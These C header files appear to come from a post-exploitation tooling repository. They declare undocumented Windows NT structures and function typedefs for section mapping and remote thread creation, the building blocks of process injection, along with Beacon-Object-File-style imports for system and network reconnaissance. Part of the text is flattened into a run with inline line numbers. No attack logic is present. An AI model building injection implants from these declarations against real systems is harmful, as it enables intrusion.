    PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \
    PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_BNO_ISOLATION \
    PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_DESKTOP_APP_POLICY \
    PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE)




// Bit flags; presumably the values of RTL_USER_PROCESS_PARAMETERS.Flags
// declared earlier in this header - confirm. The values are single bits and
// can be OR-ed together; 0x10 and 0x200..0x800 are not assigned here.
#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
#define RTL_USER_PROC_PROFILE_USER 0x00000002
#define RTL_USER_PROC_PROFILE_KERNEL 0x00000004
#define RTL_USER_PROC_PROFILE_SERVER 0x00000008
#define RTL_USER_PROC_RESERVE_1MB 0x00000020
#define RTL_USER_PROC_RESERVE_16MB 0x00000040
#define RTL_USER_PROC_CASE_SENSITIVE 0x00000080
#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100
#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000
#define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000
// Two further RTL_USER_PROC_* bit flags (single-bit values, OR-able).
#define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000
#define RTL_USER_PROC_OPTIN_PROCESS 0x00020000





// Information-class selector with explicit numeric values 0..81;
// MaxSystemInfoClass (82) is the end marker, not a usable class.
// The list is a fixed snapshot: any class numbered 82 or higher is absent.
// NOTE(review): unlike the FILE_* groups further down, this enum is not
// wrapped in an #ifndef guard, so it presumably cannot share a translation
// unit with an SDK header that declares the same name (e.g. <winternl.h>) -
// confirm. Identifiers such as SystemPrioritySeperation are spelled as
// declared here and must be kept as-is for source compatibility.
typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation = 0,
    SystemProcessorInformation = 1,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemPathInformation = 4,
    SystemProcessInformation = 5,
    SystemCallCountInformation = 6,
    SystemDeviceInformation = 7,
    SystemProcessorPerformanceInformation = 8,
    SystemFlagsInformation = 9,
    SystemCallTimeInformation = 10,
    SystemModuleInformation = 11,
    SystemLocksInformation = 12,
    SystemStackTraceInformation = 13,
    SystemPagedPoolInformation = 14,
    SystemNonPagedPoolInformation = 15,
    SystemHandleInformation = 16,
    SystemObjectInformation = 17,
    SystemPageFileInformation = 18,
    SystemVdmInstemulInformation = 19,
    SystemVdmBopInformation = 20,
    SystemFileCacheInformation = 21,
    SystemPoolTagInformation = 22,
    SystemInterruptInformation = 23,
    SystemDpcBehaviorInformation = 24,
    SystemFullMemoryInformation = 25,
    SystemLoadGdiDriverInformation = 26,
    SystemUnloadGdiDriverInformation = 27,
    SystemTimeAdjustmentInformation = 28,
    SystemSummaryMemoryInformation = 29,
    SystemMirrorMemoryInformation = 30,
    SystemPerformanceTraceInformation = 31,
    SystemObsolete0 = 32,
    SystemExceptionInformation = 33,
    SystemCrashDumpStateInformation = 34,
    SystemKernelDebuggerInformation = 35,
    SystemContextSwitchInformation = 36,
    SystemRegistryQuotaInformation = 37,
    SystemExtendServiceTableInformation = 38,
    SystemPrioritySeperation = 39,
    SystemVerifierAddDriverInformation = 40,
    SystemVerifierRemoveDriverInformation = 41,
    SystemProcessorIdleInformation = 42,
    SystemLegacyDriverInformation = 43,
    SystemCurrentTimeZoneInformation = 44,
    SystemLookasideInformation = 45,
    SystemTimeSlipNotification = 46,
    SystemSessionCreate = 47,
    SystemSessionDetach = 48,
    SystemSessionInformation = 49,
    SystemRangeStartInformation = 50,
    SystemVerifierInformation = 51,
    SystemVerifierThunkExtend = 52,
    SystemSessionProcessInformation = 53,
    SystemLoadGdiDriverInSystemSpace = 54,
    SystemNumaProcessorMap = 55,
    SystemPrefetcherInformation = 56,
    SystemExtendedProcessInformation = 57,
    SystemRecommendedSharedDataAlignment = 58,
    SystemComPlusPackage = 59,
    SystemNumaAvailableMemory = 60,
    SystemProcessorPowerInformation = 61,
    SystemEmulationBasicInformation = 62,
    SystemEmulationProcessorInformation = 63,
    SystemExtendedHandleInformation = 64,
    SystemLostDelayedWriteInformation = 65,
    SystemBigPoolInformation = 66,
    SystemSessionPoolTagInformation = 67,
    SystemSessionMappedViewInformation = 68,
    SystemHotpatchInformation = 69,
    SystemObjectSecurityMode = 70,
    SystemWatchdogTimerHandler = 71,
    SystemWatchdogTimerInformation = 72,
    SystemLogicalProcessorInformation = 73,
    SystemWow64SharedInformation = 74,
    SystemRegisterFirmwareTableInformationHandler = 75,
    SystemFirmwareTableInformation = 76,
    SystemModuleInformationEx = 77,
    SystemVerifierTriageInformation = 78,
    SystemSuperfetchInformation = 79,
    SystemMemoryListInformation = 80,
    SystemFileCacheInformationEx = 81,
    MaxSystemInfoClass = 82

} SYSTEM_INFORMATION_CLASS;


// Single-bit flags (1, 2, 4, 8); PS_ALL_FLAGS is the OR of all four and can
// serve as a validity mask. Which call consumes them is not shown here.
#define PS_REQUEST_BREAKAWAY 1
#define PS_NO_DEBUG_INHERIT 2
#define PS_INHERIT_HANDLES 4
#define PS_LARGE_PAGES 8
#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | PS_NO_DEBUG_INHERIT | PS_INHERIT_HANDLES | PS_LARGE_PAGES)

// I/O completion record. Status and Pointer share storage through the
// anonymous union, so only one of them is meaningful at a time;
// Information is a separate pointer-sized field.
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        PVOID Pointer;
    };

    ULONG_PTR Information;

} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;

// Callback pointer type taking (ApcContext, IoStatusBlock, Reserved) and
// returning nothing, NTAPI calling convention. The PIO_APC_ROUTINE_DEFINED
// guard keeps the typedef from being emitted twice when another header has
// already provided it.
#ifndef PIO_APC_ROUTINE_DEFINED
typedef
VOID
(NTAPI* PIO_APC_ROUTINE) (
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
    );
#define PIO_APC_ROUTINE_DEFINED
#endif // PIO_APC_ROUTINE_DEFINED


// Single-member structure holding one BOOLEAN.
// NOTE(review): if <windows.h> is included before this header, DeleteFile is
// a macro there (DeleteFileA / DeleteFileW), so the member's effective name
// presumably follows the UNICODE setting; the layout is unaffected - confirm
// before referring to the member by name.
typedef struct _FILE_DISPOSITION_INFORMATION {
    BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION, * PFILE_DISPOSITION_INFORMATION;

// Create-disposition values 0..5 (an enumeration, not a bit mask);
// FILE_MAXIMUM_DISPOSITION repeats the highest value. The whole group is
// skipped when FILE_SUPERSEDE is already defined by another header.
#ifndef FILE_SUPERSEDE
#define FILE_SUPERSEDE 0x00000000
#define FILE_OPEN 0x00000001
#define FILE_CREATE 0x00000002
#define FILE_OPEN_IF 0x00000003
#define FILE_OVERWRITE 0x00000004
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_MAXIMUM_DISPOSITION 0x00000005
#endif

// Define the create/open option flags
// Single-bit values that can be OR-ed together; the group is skipped when
// FILE_DIRECTORY_FILE is already defined by another header.
#ifndef FILE_DIRECTORY_FILE
#define FILE_DIRECTORY_FILE 0x00000001
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SEQUENTIAL_ONLY 0x00000004
#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_FOR_RECOVERY 0x00000400
#define FILE_RANDOM_ACCESS 0x00000800
#define FILE_DELETE_ON_CLOSE 0x00001000
#define FILE_OPEN_BY_FILE_ID 0x00002000
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
#endif // FILE_DIRECTORY_FILE

// Priority value type used by PROCESS_BASIC_INFORMATION.BasePriority below.
typedef LONG KPRIORITY;

// Basic per-process record. PebBaseAddress is typed with the PEB layout
// declared earlier in this header, so anything read through it inherits that
// layout's assumptions.
// NOTE(review): the PEB layout is presumably tied to specific Windows
// versions - verify it against the builds this code is meant to run on.
typedef struct _PROCESS_BASIC_INFORMATION
{
    NTSTATUS ExitStatus;
    PPEB PebBaseAddress;
    ULONG_PTR AffinityMask;
    KPRIORITY BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;

} PROCESS_BASIC_INFORMATION, * PPROCESS_BASIC_INFORMATION;


// File information-class selector. Numbering starts at 1 and continues
// implicitly; the trailing comments spell out each resulting value, so
// entries must not be reordered. FileMaximumInformation (48) is the end marker.
typedef enum _FILE_INFORMATION_CLASS
{
    FileDirectoryInformation = 1,
    FileFullDirectoryInformation, // 2
    FileBothDirectoryInformation, // 3
    FileBasicInformation, // 4 wdm
    FileStandardInformation, // 5 wdm
    FileInternalInformation, // 6
    FileEaInformation, // 7
    FileAccessInformation, // 8
    FileNameInformation, // 9
    FileRenameInformation, // 10
    FileLinkInformation, // 11
    FileNamesInformation, // 12
    FileDispositionInformation, // 13
    FilePositionInformation, // 14 wdm
    FileFullEaInformation, // 15
    FileModeInformation, // 16
    FileAlignmentInformation, // 17
    FileAllInformation, // 18
    FileAllocationInformation, // 19
    FileEndOfFileInformation, // 20 wdm
    FileAlternateNameInformation, // 21
    FileStreamInformation, // 22
    FilePipeInformation, // 23
    FilePipeLocalInformation, // 24
    FilePipeRemoteInformation, // 25
    FileMailslotQueryInformation, // 26
    FileMailslotSetInformation, // 27
    FileCompressionInformation, // 28
    FileObjectIdInformation, // 29
    FileCompletionInformation, // 30
    FileMoveClusterInformation, // 31
    FileQuotaInformation, // 32
    FileReparsePointInformation, // 33
    FileNetworkOpenInformation, // 34
    FileAttributeTagInformation, // 35
    FileTrackingInformation, // 36
    FileIdBothDirectoryInformation, // 37
    FileIdFullDirectoryInformation, // 38
    FileValidDataLengthInformation, // 39
    FileShortNameInformation, // 40
    FileIoCompletionNotificationInformation, // 41
    FileIoStatusBlockRangeInformation, // 42
    FileIoPriorityHintInformation, // 43
    FileSfioReserveInformation, // 44
    FileSfioVolumeInformation, // 45
    FileHardLinkInformation, // 46
    FileProcessIdsUsingFileInformation, // 47
    FileMaximumInformation // 48
} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;

// Process information-class selector. No explicit values are given, so the
// enumerators are numbered from 0 in declaration order
// (ProcessBasicInformation == 0) and must not be reordered.
// NOTE(review): not wrapped in an #ifndef guard; presumably conflicts with an
// SDK header that declares the same enum - confirm.
typedef enum _PROCESSINFOCLASS {
    ProcessBasicInformation,
    ProcessQuotaLimits,
    ProcessIoCounters,
    ProcessVmCounters,
    ProcessTimes,
    ProcessBasePriority,
    ProcessRaisePriority,
    ProcessDebugPort,
    ProcessExceptionPort,
    ProcessAccessToken,
    ProcessLdtInformation,
    ProcessLdtSize,
    ProcessDefaultHardErrorMode,
    ProcessIoPortHandlers, // Note: this is kernel mode only
    ProcessPooledUsageAndLimits,
    ProcessWorkingSetWatch,
    ProcessUserModeIOPL,
    ProcessEnableAlignmentFaultFixup,
    ProcessPriorityClass,
    ProcessWx86Information,
    ProcessHandleCount,
    ProcessAffinityMask,
    ProcessPriorityBoost,
    ProcessDeviceMap,
    ProcessSessionInformation,
    ProcessForegroundInformation,
    ProcessWow64Information,
    ProcessImageFileName,
    ProcessLUIDDeviceMapsEnabled,
    ProcessBreakOnTermination,
    ProcessDebugObjectHandle,
    ProcessDebugFlags,
    ProcessHandleTracing,
    MaxProcessInfoClass // MaxProcessInfoClass should always be the last enum
} PROCESSINFOCLASS;



//***********************************************************************************************************************************************************************************************
//********************************************* *****************************************************************
//********************************************* *****************************************************************
//*********************************************************************************************************************************************************************************************** 940 | 941 | typedef NTSTATUS(NTAPI* fnNtCreateSection)( 942 | OUT PHANDLE SectionHandle, 943 | IN ACCESS_MASK DesiredAccess, 944 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 945 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 946 | IN ULONG SectionPageProtection, 947 | IN ULONG AllocationAttributes, 948 | IN HANDLE FileHandle OPTIONAL 949 | ); 950 | 951 | typedef NTSTATUS(NTAPI* fnNtMapViewOfSection)( 952 | IN HANDLE SectionHandle, 953 | IN HANDLE ProcessHandle, 954 | IN OUT PVOID* BaseAddress, 955 | IN SIZE_T ZeroBits, 956 | IN SIZE_T CommitSize, 957 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 958 | IN OUT PSIZE_T ViewSize, 959 | IN SECTION_INHERIT InheritDisposition, 960 | IN ULONG AllocationType, 961 | IN ULONG Protect 962 | ); 963 | 964 | 965 | typedef NTSTATUS(NTAPI* fnNtCreateThreadEx)( 966 | PHANDLE ThreadHandle, 967 | ACCESS_MASK DesiredAccess, 968 | POBJECT_ATTRIBUTES ObjectAttributes, 969 | HANDLE ProcessHandle, 970 | PVOID StartRoutine, 971 | PVOID Argument, 972 | ULONG CreateFlags, 973 | SIZE_T ZeroBits, 974 | SIZE_T StackSize, 975 | SIZE_T MaximumStackSize, 976 | PPS_ATTRIBUTE_LIST AttributeList 977 | ); 978 | 979 | #endif // !STRUCTS_H -------------------------------------------------------------------------------- /include/bofdefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen) 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | //KERNEL32 18 | // #define BOF 19 | #ifdef BOF 20 | WINBASEAPI void * WINAPI KERNEL32$VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 21 | 
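// KERNEL32 imports (continued): heap/virtual memory, time conversion,
// process/thread, fiber and file APIs. These declarations sit inside the
// `#ifdef BOF` branch of this header.
// Symbols follow the MODULE$Function naming used throughout the file;
// presumably the object-file loader resolves the part after '$' from the named
// DLL at load time -- confirm against the loader in use.

// Memory management
// NOTE(review): the Windows SDK declares VirtualFree as returning BOOL; `int`
// has the same width, so the declaration is kept as the author wrote it.
WINBASEAPI int WINAPI KERNEL32$VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc (UINT, SIZE_T);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree (HLOCAL);
WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
// (VOID) instead of an empty list: before C23 an empty parameter list is not a
// prototype, so stray arguments would not be diagnosed.
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap (VOID);
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);

// Message formatting and string conversion
WINBASEAPI DWORD WINAPI KERNEL32$FormatMessageA (DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments);
// NOTE(review): the module prefix is spelled "Kernel32" here and "KERNEL32"
// everywhere else. The spelling is part of the symbol name callers reference,
// so it is left unchanged.
WINBASEAPI int WINAPI Kernel32$WideCharToMultiByte (UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);

// Time and date
WINBASEAPI int WINAPI KERNEL32$FileTimeToLocalFileTime (CONST FILETIME *lpFileTime, LPFILETIME lpLocalFileTime);
WINBASEAPI int WINAPI KERNEL32$FileTimeToSystemTime (CONST FILETIME *lpFileTime, LPSYSTEMTIME lpSystemTime);
WINBASEAPI int WINAPI KERNEL32$GetDateFormatW (LCID Locale, DWORD dwFlags, CONST SYSTEMTIME *lpDate, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate);
WINBASEAPI VOID WINAPI KERNEL32$GetSystemTimeAsFileTime (LPFILETIME lpSystemTimeAsFileTime);
WINBASEAPI VOID WINAPI KERNEL32$GetLocalTime (LPSYSTEMTIME lpSystemTime);
WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToFileTime (CONST SYSTEMTIME *lpSystemTime, LPFILETIME lpFileTime);
WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToTzSpecificLocalTime (CONST TIME_ZONE_INFORMATION *lpTimeZoneInformation, CONST SYSTEMTIME *lpUniversalTime, LPSYSTEMTIME lpLocalTime);

// System information
WINBASEAPI WINBOOL WINAPI KERNEL32$GlobalMemoryStatusEx (LPMEMORYSTATUSEX lpBuffer);
WINBASEAPI WINBOOL WINAPI KERNEL32$GetDiskFreeSpaceExA (LPCSTR lpDirectoryName, PULARGE_INTEGER lpFreeBytesAvailableToCaller, PULARGE_INTEGER lpTotalNumberOfBytes, PULARGE_INTEGER lpTotalNumberOfFreeBytes);

// Processes, threads and fibers
WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID);
// WINAPI added: this was the only import in this run declared without a
// calling convention, which matters for 32-bit builds.
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentProcessId (VOID);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
WINBASEAPI DWORD WINAPI KERNEL32$GetTickCount (VOID);
WINBASEAPI ULONGLONG WINAPI KERNEL32$GetTickCount64 (VOID);
WINBASEAPI LPVOID WINAPI KERNEL32$CreateFiber (SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter);
WINBASEAPI LPVOID WINAPI KERNEL32$ConvertThreadToFiber (LPVOID lpParameter);
WINBASEAPI WINBOOL WINAPI KERNEL32$ConvertFiberToThread (VOID);
WINBASEAPI VOID WINAPI KERNEL32$DeleteFiber (LPVOID lpFiber);
WINBASEAPI VOID WINAPI KERNEL32$SwitchToFiber (LPVOID lpFiber);
WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
WINBASEAPI VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds);

// Files
WINBASEAPI WINBOOL WINAPI KERNEL32$DeleteFileW (LPCWSTR lpFileName);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
WINBASEAPI DWORD WINAPI KERNEL32$GetFileSize (HANDLE hFile, LPDWORD lpFileSizeHigh);
WINBASEAPI WINBOOL WINAPI KERNEL32$ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId);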
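// KERNEL32 imports (continued): strings, paths, file enumeration, heap helper
// macros, environment, tool-help snapshots, module loading and locale APIs,
// followed by the WTSAPI32, IPHLPAPI and MSVCRT import declarations.
// Symbols follow the MODULE$Function naming used throughout the file.

WINBASEAPI WINBOOL WINAPI KERNEL32$GetComputerNameExW (COMPUTER_NAME_FORMAT NameType, LPWSTR lpBuffer, LPDWORD nSize);
WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString);
// NOTE(review): lstrcatW takes no destination size; callers must make sure the
// destination buffer is large enough before appending.
WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcatW (LPWSTR lpString1, LPCWSTR lpString2);
WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpynW (LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength);
WINBASEAPI DWORD WINAPI KERNEL32$GetFullPathNameW (LPCWSTR lpFileName, DWORD nBufferLength, LPWSTR lpBuffer, LPWSTR *lpFilePart);
WINBASEAPI DWORD WINAPI KERNEL32$GetFileAttributesW (LPCWSTR lpFileName);
WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentDirectoryW (DWORD nBufferLength, LPWSTR lpBuffer);
WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileW (LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData);
WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileA (char * lpFileName, LPWIN32_FIND_DATA lpFindFileData);
WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileW (HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);
WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileA (HANDLE hFindFile, LPWIN32_FIND_DATA lpFindFileData);
WINBASEAPI WINBOOL WINAPI KERNEL32$FindClose (HANDLE hFindFile);
WINBASEAPI VOID WINAPI KERNEL32$SetLastError (DWORD dwErrCode);

// Heap helpers over the process heap. Allocations are zero-filled
// (HEAP_ZERO_MEMORY). Arguments and the whole intRealloc expansion are
// parenthesized so the macros behave as single expressions: the original
// unparenthesized `(ptr) ? a : b` would bind incorrectly inside a larger
// expression such as `intRealloc(p, n) == NULL`.
// intRealloc evaluates `ptr` more than once; pass a plain variable. Assign its
// result to a temporary first, since a failed reallocation returns NULL and
// overwriting the only copy of the pointer would leak the original block.
#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (size))
#define intRealloc(ptr, size) ((ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (ptr), (size)) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (size)))
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (addr))
#define intZeroMemory(addr,size) MSVCRT$memset((addr),0,(size))

// WINAPI added to GlobalAlloc/GlobalFree: they were declared without a calling
// convention, unlike the other KERNEL32 imports, which matters for 32-bit
// builds where the callee cleans the stack.
DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes);
DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL hMem);
DECLSPEC_IMPORT LPTCH WINAPI KERNEL32$GetEnvironmentStrings();
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$FreeEnvironmentStringsA(LPSTR);
WINBASEAPI DWORD WINAPI KERNEL32$ExpandEnvironmentStringsW (LPCWSTR lpSrc, LPWSTR lpDst, DWORD nSize);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID);
WINBASEAPI WINBOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
WINBASEAPI WINBOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
WINBASEAPI WINBOOL WINAPI KERNEL32$Module32First(HANDLE hSnapshot,LPMODULEENTRY32 lpme);
WINBASEAPI WINBOOL WINAPI KERNEL32$Module32Next(HANDLE hSnapshot,LPMODULEENTRY32 lpme);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName);
WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName);
WINBASEAPI WINBOOL WINAPI KERNEL32$FreeLibrary (HMODULE hLibModule);
DECLSPEC_IMPORT WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR);
DECLSPEC_IMPORT int WINAPI KERNEL32$GetLocaleInfoEx(LPCWSTR lpLocaleName, LCTYPE LCType, LPWSTR lpLCData, int cchData);
// NOTE(review): the Windows SDK declares lpLocaleName as LPWSTR (it is the
// output buffer); the const-qualified form is kept so existing callers compile.
WINBASEAPI int WINAPI KERNEL32$GetSystemDefaultLocaleName(LPCWSTR lpLocaleName, int cchLocaleName);
DECLSPEC_IMPORT LCID WINAPI KERNEL32$LocaleNameToLCID(LPCWSTR lpName, DWORD dwFlags);
DECLSPEC_IMPORT int WINAPI KERNEL32$GetDateFormatEx(LPCWSTR lpLocaleName, DWORD dwFlags, const SYSTEMTIME *lpData, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate, LPCWSTR lpCalendar);


//WTSAPI32
DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSEnumerateSessionsA(LPVOID, DWORD, DWORD, PWTS_SESSION_INFO*, DWORD*);
DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSQuerySessionInformationA(LPVOID, DWORD, WTS_INFO_CLASS , LPSTR*, DWORD*);
DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSFreeMemory(PVOID);

//Iphlpapi.lib
//ULONG WINAPI IPHLPAPI$GetAdaptersInfo (PIP_ADAPTER_INFO AdapterInfo, PULONG SizePointer);
DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetAdaptersInfo(PIP_ADAPTER_INFO,PULONG);
DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetIpForwardTable (PMIB_IPFORWARDTABLE pIpForwardTable, PULONG pdwSize, WINBOOL bOrder);
DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetNetworkParams(PFIXED_INFO,PULONG);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetUdpTable (PMIB_UDPTABLE UdpTable, PULONG SizePointer, WINBOOL Order);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetTcpTable (PMIB_TCPTABLE TcpTable, PULONG SizePointer, WINBOOL Order);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetIpNetTable(PMIB_IPNETTABLE IpNetTable,PULONG SizePointer, BOOL Order);

//MSVCRT
WINBASEAPI char *__cdecl MSVCRT$_ultoa(unsigned long _Value,char *_Dest,int _Radix);
WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements);
WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
WINBASEAPI int __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size);
WINBASEAPI void *__cdecl MSVCRT$realloc(void *_Memory, size_t _NewSize);
WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
// NOTE(review): the CRT's memset returns void * (the destination). Declared
// `void` here, so the result cannot be used; harmless for intZeroMemory.
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
// NOTE(review): sprintf has no size limit on the destination; prefer the
// bounded vsnprintf/_snwprintf declared below where the input length is not
// fixed.
WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...);
WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg);
WINBASEAPI int __cdecl MSVCRT$_snwprintf(wchar_t * __restrict__ _Dest,size_t _Count,const wchar_t * __restrict__ _Format,...);
WINBASEAPI errno_t __cdecl MSVCRT$wcscpy_s(wchar_t *_Dst, rsize_t _DstSize, const wchar_t *_Src);
WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
WINBASEAPI size_t __cdecl MSVCRT$wcstombs(char * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _MaxCount);
// NOTE(review): the CRT's wcscmp returns int, not wchar_t *. With this
// declaration callers can only test the result against zero; ordering tests
// (< 0, > 0) are not meaningful on a pointer type. Left unchanged because
// callers outside this view may depend on the declared type; switch to `int`
// once they are checked.
WINBASEAPI wchar_t *__cdecl MSVCRT$wcscmp(const wchar_t *_lhs,const wchar_t *_rhs);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok(wchar_t * __restrict__ _Str,const wchar_t * __restrict__ _Delim);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok_s(wchar_t *_Str,const wchar_t *_Delim,wchar_t **_Context);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcsstr(const wchar_t *_Str,const wchar_t *_SubStr);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcscat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source, size_t _Count);
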